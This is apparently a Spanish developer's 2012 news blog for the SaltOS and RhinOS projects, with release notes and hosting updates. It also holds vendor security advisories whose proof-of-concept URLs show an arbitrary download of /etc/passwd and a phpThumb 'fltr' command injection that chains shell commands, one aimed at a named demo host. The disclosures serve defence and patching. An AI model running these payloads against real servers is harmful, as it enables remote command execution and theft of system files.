09/12/2012

Network World probó 6 bases de datos gratuitas, MariaDB gana la prueba

26/11/2012

Manual para la instalación de SaltOS

Setup

Josep Sanz

SaltOS, se distribuye en 4 paquetes diferentes: PHP: este paquete contiene el programa SaltOS y incluye todo lo necesario para descomprimir y desempaquetar el programa de forma online. Para usar este paquete, descarguese el paquete y dejelo en un directorio de su hosting visible desde Internet. Acceda al fichero de instalación con un navegador y aparecerá la pantalla de "Bienvenida al instalador de SaltOS". Siga los pasos que se le indican y podrá instalar SaltOS en su servidor de forma…

27/09/2012

Añadido SaltOS como caso de estudio en el site de MariaDB

Se ha publicado otro caso de éxito de SaltOS en el site de MariaDB: http://kb.askmonty.org/en/saltos-sees-gains-with-subqueries-in-mariadb/

13/09/2012

Recomiendo usar MariaDB en lugar de MySQL

Tras estar desarrollando varias aplicaciones que usan MySQL, me he dado cuenta que es muy ineficiente cuando las tablas tienen muchos registros y las consultas tienen varios joins y subqueries. Más info en: ¿Porque usar MariaDB en lugar de MySQL?

24/08/2012

Exploit found...

He recibido un correo electrónico con el texto siguiente: "Exploit found. hey fucking script kiddies, write good scripts... god damn it. http://packetstormsecurity.org/files/115855" De "Hans Wurst" mediante el formulario de contacto de la web.

Como yo no sé cómo ponerme en contacto con él porque no ha puesto una dirección de correo electrónico real, quiero preguntarle desde aquí: ¿eres un programador?, ¿has hecho alguna aportación a la sociedad? considero que su correo electrónico como prepotente.

09/08/2012

¿Que es el "error 500: Internal error"?

Error 500

Josep Sanz

El error 500, es un error generado por el servidor cuando se encuentra con una situación de error que no puede resolver de forma automática. Es decir: si no se encuentra un fichero, el error es el 404 (Not found), si no se puede listar un directorio, el error 403 será lanzado (Forbidden). Para los errores que no tienen una definición explícita, se generará el error 500 (Internal error). Este error, normalmente aparece en Apache: cuando se usan directivas no soportadas en los ficheros…

29/07/2012

SaltOS ya funciona sin problemas en PHP 5.4

Ahora que ya dispongo de un equipo con PHP 5.4, he podido hacer los tests, aplicar los cambios y hacer las mejoras necesarias en el código para que SaltOS funcione correctamente en PHP 5.4. Podeis descargarlo desde el nightly de esta misma noche.

15/07/2012

He movido el entorno de demos a mi servidor personal

RaCaMeT ha tenido que dejar el VPS que tenia contratado y por ese motivo, he tenido que mover todo el entorno de demos a mi servidor personal. Desde los proyecto SaltOS y RhinOS quiero decir: gracias RaCaMeT por estos meses de hosting gratuito.

30/06/2012

Podeis descargar ya la versión nightly de SaltOS

Como ya anuncie hace unos días, podeis descargar la version nightly de SaltOS desde sourceforge: http://sourceforge.net/projects/saltos/files/nightly/

14/06/2012

Increible la respuesta del desarrollador de la librería jsmin

Esta mañana he detectado un bug en una librería que uso frecuentemente y al notificarla al autor, me ha respondido "pues no haga eso". Si quereis ver todo el hilo, ir a https://github.com/rgrove/jsmin-php/issues/14

10/06/2012

Estoy preparando una versión nightly de SaltOS

Como mucha gente me pregunta acerca de cómo se puede descargar la última versión de SaltOS (es decir, la que tengo en desarrollo), voy a publicar una versión nocturna cada noche con todos los cambios actuales. En breve lo tendré montado públicamente.

22/05/2012

La empresa ABCustom me ha cedido un despacho para poder programar tranquilo

La empresa ABCustom, empresa que desde hace tiempo usa SaltOS en su gestión interna, ha decidido agradecerme el esfuerzo que hago con el proyecto cediendome una mesa de trabajo ubicada en una de sus oficinas de Barcelona. También he podido dejar el servidor de subversion, que uso para el control de versiones, conectado a internet de alta velocidad. Realmente es gratificante ver que la rueda gira.

01/05/2012

Problemas con CSS generados en PHP y Internet Explorer 9

CSS, PHP, Internet Explorer

Josep Sanz

Tras algunos meses de estar entre nosotros el nuevo navegador de Microsoft, don Internet Explorer 9, algunos visitantes de saltos.net me informaron de que la web no se veia correctamente usando este navegador. Tras mirar lo que sucedia, detecte desde los logs del apache que las peticiones de las hojas de estilo que hace Internet Explorer 9, eran respondidas por el própio servidor apache con un error HTTP 406 Not acceptable (No aceptable). Este portal, esta desarrollado con RhinOS, el cual…

22/03/2012

Detectada vulnerabilidad de seguridad en RhinOS

Advisory:
- HSV-2012-0005
Time Line:
- Detection Date: 22/03/2012
- Notification Date: 22/03/2012
- Fix Date: 22/03/2012
- Disclosure Date: 22/03/2012
Name:
- Arbitary File Download in RhinOS v3.0
Afected Versions:
- SaltOS v3.0 r1238 and previous
References:
- CVE ID: N/A
- Bugtraq ID: N/A
- OSVDB ID: N/A
Descriptión:
- Authenticated users can download any file from the server where RhinOS is instaled
POC / Exploit:
- http://www.example.com/admin/inicio.php?include=php/download.php&name=passwd.txt&file=/etc/passwd
Solution:
- Update the version of RhinOS v3.0 to r1247 or later

16/03/2012

Detectadas vulnerabilidades de seguridad en SaltOS y RhinOS

Advisory:
- HSV-2012-0001
Time Line:
- Detection Date: 14/03/2012
- Notification Date: 15/03/2012
- Fix Date: 16/03/2012
- Disclosure Date: 16/03/2012
Name:
- Information Disclosure in SaltOS v3.1
Afected Versions:
- SaltOS v3.1 r5100 and previous
References:
- CVE ID: CVE-2010-1598
- Bugtraq ID: 39605
- OSVDB ID: 63939
Descriptión:
- is possible to obtain information about the server through the library phpthumb.php
POC / Exploit:
- http://www.example.com/code/lib/phpthumb/phpThumb.php?phpThumbDebug=9
Solution:
- Change the value of "$PHPTHUMB_CONFIG['disable_debug']= false;" to "$PHPTHUMB_CONFIG['disable_debug']= true;" in phpThumb.config.php, or update to the version of SaltOS to r5104 or latter
========================================================================================================================
Advisory:
- HSV-2012-0002
Time Line:
- Detection Date: 14/03/2012
- Notification Date: 15/03/2012
- Fix Date: 16/03/2012
- Disclosure Date: 16/03/2012
Name:
- Command Injection in SaltOS v3.1
Afected Versions:
- SaltOS v3.1 r5100 and previous
References:
- CVE ID: CVE-2010-1598
- Bugtraq ID: 39605
- OSVDB ID: 63939
Descriptión:
- is possible to run commands in the server through the 'fltr' parameter in the library phpthumb.php
POC / Exploit:
- http://racamet.saltos.net/code/lib/phpthumb/phpThumb.php?fltr=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -la ;cat /etc/passwd; & src=file.jpg & phpThumbDebug=9
Solution:
- Change the value of "$PHPTHUMB_CONFIG['disable_debug']= false;" to "$PHPTHUMB_CONFIG['disable_debug']= true;" in phpThumb.config.php, or update to the version of SaltOS to r5104 or latter
========================================================================================================================
Advisory:
- HSV-2012-0003
Time Line:
- Detection Date: 14/03/2012
- Notification Date: 15/03/2012
- Fix Date: 16/03/2012
- Disclosure Date: 16/03/2012
Name:
- Information Disclosure in RhinOS v3.0
Afected Versions:
- SaltOS v3.0 r1238 and previous
References:
- CVE ID: CVE-2010-1598
- Bugtraq ID: 39605
- OSVDB ID: 63939
Descriptión:
- is possible to obtain information about the server through the library phpthumb.php
POC / Exploit:
- http://www.example.com/code/lib/phpthumb/phpThumb.php?phpThumbDebug=9
Solution:
- Change the value of "$PHPTHUMB_CONFIG['disable_debug']= false;" to "$PHPTHUMB_CONFIG['disable_debug']= true;" in phpThumb.config.php, or update to the version of RhinOS to r1241 or latter
========================================================================================================================
Advisory:
- HSV-2012-0004
Time Line:
- Detection Date: 14/03/2012
- Notification Date: 15/03/2012
- Fix Date: 16/03/2012
- Disclosure Date: 16/03/2012
Name:
- Command Injection in RhinOS v3.0
Afected Versions:
- SaltOS v3.0 r1238 and previous
References:
- CVE ID: CVE-2010-1598
- Bugtraq ID: 39605
- OSVDB ID: 63939
Descriptión:
- Is possible to run commands in the server through the 'fltr' parameter in the library phpthumb.php
POC / Exploit:
- http://www.example.com/code/lib/phpthumb/phpThumb.php?fltr=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -la ;cat /etc/passwd; & src=file.jpg & phpThumbDebug=9
Solution:
- Change the value of "$PHPTHUMB_CONFIG['disable_debug']= false;" to "$PHPTHUMB_CONFIG['disable_debug']= true;" in phpThumb.config.php, or update to the version of RhinOS to r1241 or latter

07/02/2012

Nuevo entorno de demos por RaCaMeT

Gracias a RaCaMeT, podreis disfrutar de un VPS con 8 nucleos, 3Gb de RAM y 100Gb de NAS conectados con una conexión rápida a internet para probar SaltOS y RhinOS.

01/02/2012

Servicio de demos restaurado

Tras hacer unas mejoras en el sistema de captcha, el servicio de demos quedo fuera de servicio impidiendo la creación de demos. El error se acaba de detectar y solucionar, y todo ha vuelto a la normalidad. Lo siento por las molestias, pero estoy haciendo mejoras para evitar el molesto spam dentro del foro.

29/01/2012

¿Que es el Cloud Computing?

Cloud computing

Josep Sanz

Introducción: El Cloud Computing, también llamado computación en la nuve,  es el término empleado para hablar del concepto de disponer de las aplicaciones desde Internet. Para entender la diferencia entre Cloud Computing y el modelo tradicional, hay que explicar algunas partes de la historia de la informática brevemente: Al principio de la informática, las aplicaciones se ejecutaban en servidores y los usuarios operaban con terminales (también llamados terminales tontos)…

24/01/2012

Un año más de hosting para saltos.net gracias a dinahosting

Dinahosting ha confirmado hoy que continuará con el patrocinio por un año más a los proyectos Saltos y RhinOS, dando un hosting linux gratuito para el sitio web del proyecto. Como siempre a todos los que colaboran con estos proyectos: Gracias.

Por cierto, estoy buscando un proveedor de housing que me permita poner una torre de ordenador donde actualmente se ejecutan las demos de SaltOS y RhinOS.

13/01/2012

Publicadas nuevas releases de SaltOS y RhinOS (r4941)

Acabo de publicar una nueva release de SaltOS que actualiza y corrige:
  • Se ha actualizado JQuery-UI a la release 1.8.17
  • Solucionado un error en el wizard de instalación (se llamaba a una versión incorrecta de JQuery)
  • Solucionados los errores que afectaban al sistema de permisos impidiendo ver el buscador y carpetas del usuario.

13/01/2012

Nuevo servidor para el entorno de demos de SaltOS y RhinOS

Jordi Company y Andrés Diaz, me han regalado un servidor para sustituir al viejo equipo que tenia en mi casa para el entorno de demos de SaltOS y RhinOS. Las especificaciones de la nueva máquina son las siguientes:

  • Intel Xeon 5130 (4M Cache, 2.00 GHz)
  • 6Gb RAM DDR2 (2x2Gb + 2x1Gb)
  • 4 HDD SATA2 (2x1Tb, 1x320Gb, 1x80Gb)
El equipo ya esta conectado y funcionando, y la verdad, he notado un aumento en la velocidad de ejecución, cosa que hará que la experiencia de los usuarios en la zona de demos sea más positiva.

02/01/2012

Publicadas nuevas releases de SaltOS y RhinOS (r4908)

Buenos días seguidores de SaltOS y RhinOS. Como ya anuncie la anterior semana, acabo de subir a sourceforge los nuevos paquetes con las mejoras comentadas, así como algunas actualizaciones de librerias de terceros.


Líneas de XML
60,895
Líneas de PHP
18,637
Líneas de JS
11,620
Líneas de XSLT
2,498
Líneas de CSV
1,919
Líneas de CSS
577